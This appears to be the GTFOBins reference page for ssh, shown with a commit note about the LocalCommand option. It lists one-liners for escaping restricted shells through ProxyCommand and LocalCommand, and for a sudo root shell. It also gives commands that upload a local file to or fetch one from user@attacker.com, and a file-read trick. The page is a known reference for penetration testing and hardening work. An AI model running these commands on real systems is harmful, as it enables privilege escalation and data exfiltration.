GTFOBins.github.io/_gtfobins/ssh.md
James Spadaro cd05b58e70
Add LocalCommand option to SSH
SSH has a LocalCommand option that will run a given command on the client machine after a successful connection.  It is generally disabled, but can be enabled on the command line with "-oPermitLocalCommand=yes".  This is useful for bypassing restricted shells.

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-05-01 11:07:53 +02:00

1.1 KiB

functions
shell file-upload file-download file-read sudo
description code
Reconnecting may help bypassing restricted shells. ssh localhost $SHELL --noprofile --norc
description code
Spawn interactive shell through ProxyCommand option. ssh -o ProxyCommand=';sh 0<&2 1>&2' x
description code
Spawn interactive shell on client, requires a successful connection towards `host`. ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
description code
Send local file to a SSH server. HOST=user@attacker.com RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH
description code
Fetch a remote file from a SSH server. HOST=user@attacker.com RPATH=file_to_get LPATH=file_to_save ssh $HOST "cat $RPATH" > $LPATH
description code
The read file content is corrupted by error prints. LFILE=file_to_read ssh -F $LFILE localhost
description code
Spawn interactive root shell through ProxyCommand option. sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x